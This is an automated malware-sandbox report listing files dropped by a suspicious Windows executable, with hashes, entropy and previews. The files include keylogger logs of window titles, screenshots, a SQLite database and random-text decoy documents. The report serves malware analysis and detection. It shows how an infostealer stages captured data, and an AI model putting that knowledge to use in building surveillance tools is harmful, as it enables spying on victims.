                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69156792375111
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                      MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                      SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                      SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                      SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                      Malicious:false
                                                                                      Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\YPSIACHYXW.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.700014595314478
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                      MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                      SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                      SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                      SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                      Malicious:false
                                                                                      Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698801429970146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                      MD5:488BC4EF686937916ECE6285266A6075
                                                                                      SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                      SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                      SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                      Malicious:false
                                                                                      Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698801429970146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                      MD5:488BC4EF686937916ECE6285266A6075
                                                                                      SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                      SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                      SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                      Malicious:false
                                                                                      Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataCRIBJVmC.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2607
                                                                                      Entropy (8bit):4.324649987933896
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:t6CCeo11111UuUuUuUuUuUuUuSSSSSSSDDDDDDtututututututuBBBBBBWWWWW5:v77777775
                                                                                      MD5:5297DBAF44A4DFF905040AD58028F050
                                                                                      SHA1:72FD50B113D9513E0FA48CE4855C017F66500F7C
                                                                                      SHA-256:7F0A346CAFEBB4621514CC5E7F1C411D825CE176A93856237D11486D9CEAF0DA
                                                                                      SHA-512:26BA7BE3A63A32BED0D3EFC8B12E45319511ECF7F62127C02A0C32FA497D3910F2B7C74F155E79E8E5491D1382BC67C620995C4A9434326C38BE23B59E40E50D
                                                                                      Malicious:false
                                                                                      Preview:..[14:46:27]<<Program Manager>>....[14:46:27]<<Program Manager>>....[14:46:28]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:43]<<Program Manager>>....[14:46:43]<<Program Manager>>....[14:46:4

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataJizDTsVG.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1353
                                                                                      Entropy (8bit):4.360555784684392
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:thNNNNSlllllllccccccccoSoSoSoSoSoSoSKKKKKKKBBBBBx:5xxxxxxD
                                                                                      MD5:78482DC2A7045CA6772B8AE697E375F1
                                                                                      SHA1:A70A36AC7F9CF19381B84E8BBF64F4203EEF7E3B
                                                                                      SHA-256:ECBFA7ED91F73B5E20C4A6F139CE13653B4C86F1302455D34D29624E14468F31
                                                                                      SHA-512:B4C42CB994FCCAB82F3C168910E24F5CA71CAED1546614F7DC9CC51D589A0CA7BB1BC0D75CAB63A091C2707C78CE495442669EC3BA7DDF48C4E0D7617030698C
                                                                                      Malicious:false
                                                                                      Preview:..[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:5

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatawIMKYJdN.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2244
                                                                                      Entropy (8bit):4.363368894772879
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tIzIII1f1f1f1f1f1f1fSSSSSSSDDDDDDDssssssVVVVVVV+s+s+s+s+s+s+PN+P:trWWWWWr
                                                                                      MD5:D566E3085CCE22156FBD90830078D162
                                                                                      SHA1:B7BB53AC29030ED5C54912501F7699A807BF80B8
                                                                                      SHA-256:C1216F1653AD681F166B959523E7351A6E70FBC8E7471BB80388EC368AF9736D
                                                                                      SHA-512:C08BEB581A19DF6B67144FE3CA20AC0DFEA050571F651BF2FB0CB3F2383D896AD211AEF14FC759A9C9B3A8E13AE88013C3696F9319C2A259FDE4F575AEF1B9AD
                                                                                      Malicious:false
                                                                                      Preview:..[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:0

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogganchedTSADAsTxnerPUZbggalesaurus

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotOlMgWEEg.BMP

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.777741511521939
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:SByTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRC:rTevdhYdTpGizoYQ7SJnwW6X37
                                                                                      MD5:FC0184B3DC6E477B5F3784F39CCF84CD
                                                                                      SHA1:07FD545B7C032A395FE289F8115936FAE212671A
                                                                                      SHA-256:4A880377526D024748974AC57B2E531D40B3A29455F47F87E63348B505F69826
                                                                                      SHA-512:5483FA2A7968F221AFD93590562398AEF80C09670B023728CBFC07BE537DE41209C64DB76D92313E7F1EC3FA6D25BAB6D3007D13245CA2260AC500657955E239
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotYpJRkxJH.BMP

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.734265430249111
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:S6bTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRM:BTevdhYdTpGizoYQ7mpdItEfjQ
                                                                                      MD5:9A3BF19DA7D23F6F26B96F4CBB35BD61
                                                                                      SHA1:31116775E740A775EA6D14851A8395D09678C5B9
                                                                                      SHA-256:BEF07AF03D86FFBD11E9465EB6B21C3561598C0C14AA05A259534C18541A4583
                                                                                      SHA-512:78018FFAE35D14603BBA90AC5D28B22B9A40738FFCDB7C32C53A62CA4B41B6CE6D3DD26B4FAA58D74F85074C44AD035168B10E83EE54000F529AD1AC13CC22CB
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotnEqzxdUQ.BMP

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.7777441118083175
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:S6bTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRC:BTevdhYdTpGizoYQ7SJnwW6X37
                                                                                      MD5:2C81483AF16DECA1CDC1B6BCE7DD9330
                                                                                      SHA1:9480D18E09678BF6401A6FF12B750F5A70F8B630
                                                                                      SHA-256:3394AFB6A7FE852EB51456009D960562FC9165BBF198BB6EB92348E3BD163AB1
                                                                                      SHA-512:B5639373437A3366CEC386E7869A730841699330FF5CFA327D321ACBE6715FE3F0D91AFFEBFBBE5F9F9FF5C1F6AB299BD96959DA1714A04B112FA750BAA18403
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

